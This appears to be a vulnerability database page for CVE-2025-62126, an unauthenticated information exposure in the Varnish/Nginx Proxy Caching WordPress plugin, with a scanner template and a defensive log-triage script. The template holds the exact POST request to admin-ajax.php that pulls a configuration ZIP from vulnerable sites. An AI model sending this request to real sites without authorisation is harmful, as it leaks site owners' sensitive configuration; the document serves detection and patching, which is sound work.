WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure
CVE-2025-62126
Verified
Description
Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an "insertion of sensitive information into sent data" vulnerability caused by improper handling of embedded sensitive data. It lets attackers retrieve sensitive information; exploitation requires crafted requests.
Severity
Medium
CVSS Score
5.3
Exploit Probability
3%
Affected Product
varnish-caching-wordpress-plugin
Published Date
March 26, 2026
Template Author
pussycat0x
CVE-2025-62126.yaml
id: CVE-2025-62126

info:
  name: WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests.
  remediation: |
    Update to the latest version beyond 1.8.3.
  impact: |
    Attackers can retrieve embedded sensitive information, potentially leading to data leakage.
  reference:
    - https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure
    - https://nvd.nist.gov/vuln/detail/CVE-2025-62126
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62126
    epss-score: 0.03313
    epss-percentile: 0.87405
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: razvanstanga
    product: varnish-caching-wordpress-plugin
    framework: wordpress
  tags: cve,cve2025,wordpress,wp,wp-plugin,vcaching,exposure

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - "504b0304"

      - type: word
        part: content_type
        words:
          - "application/zip"
          - "application/octet-stream"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: header
        group: 1
        regex:
          - 'filename="?([^";\r\n]+)'
# digest: 4a0a004730450221009591406534b5666e81aacc27a86e8988fc85b4c10519c98f40fe5430639fbcca0220033ca9a2f768206b7cc2a5a897a2ae0e704748ce1c366b980f04f2af21800df1:922c64590222798bb761d5b6d8e72950
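Added example (not part of the template or the plugin's code): a log triage script that looks for the same request and response indicators the template matches on, so defenders can check whether the download action was already requested without a login session. The JSON log schema (field names such as body, cookie, resp_ctype, resp_cdisp), the sample records and the example_conf.zip filename are constructed assumptions; treating a wordpress_logged_in_ cookie as "signed in" is a heuristic.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample records, one JSON object per line; the field names are
# assumptions about a proxy/WAF log that records request bodies.
SAMPLE_LOG = r'''
{"src":"198.51.100.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4","cookie":"","status":200,"resp_ctype":"application/zip","resp_cdisp":"attachment; filename=\"example_conf.zip\""}
{"src":"198.51.100.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=varnish_caching_download&varnish_caching_varnish_version=4","cookie":"","status":403,"resp_ctype":"text/html","resp_cdisp":""}
{"src":"203.0.113.20","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=varnish_caching_download&varnish_caching_varnish_version=4","cookie":"wordpress_logged_in_0123abcd=admin%7C1","status":200,"resp_ctype":"application/zip","resp_cdisp":"attachment; filename=\"example_conf.zip\""}
{"src":"192.0.2.44","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=heartbeat","cookie":"","status":200,"resp_ctype":"application/json","resp_cdisp":""}
'''

# Content types and filename pattern mirror the template's matchers/extractor.
ARCHIVE_TYPES = ("application/zip", "application/octet-stream")
FILENAME_RE = re.compile(r'filename="?([^";\r\n]+)')


def triage(log_text):
    """Return (src, verdict, filename) for each download request without a login cookie."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec["method"] != "POST" or not rec["path"].endswith("/wp-admin/admin-ajax.php"):
            continue
        if parse_qs(rec["body"]).get("action") != ["varnish_caching_download"]:
            continue
        # Heuristic: a WordPress login cookie marks a signed-in session; skip those.
        if "wordpress_logged_in_" in rec.get("cookie", ""):
            continue
        ctype = rec["resp_ctype"].split(";")[0].strip().lower()
        served = rec["status"] == 200 and ctype in ARCHIVE_TYPES
        match = FILENAME_RE.search(rec.get("resp_cdisp", ""))
        findings.append((rec["src"],
                         "archive-served" if served else "attempt",
                         match.group(1) if served and match else None))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

An "archive-served" verdict means the server answered 200 with an archive content type; the log cannot confirm the ZIP magic bytes the template checks in the body, so confirm against the stored response or the plugin version.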
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-62126
CWE ID:
cwe-200
Remediation Steps
Update to the latest version beyond 1.8.3.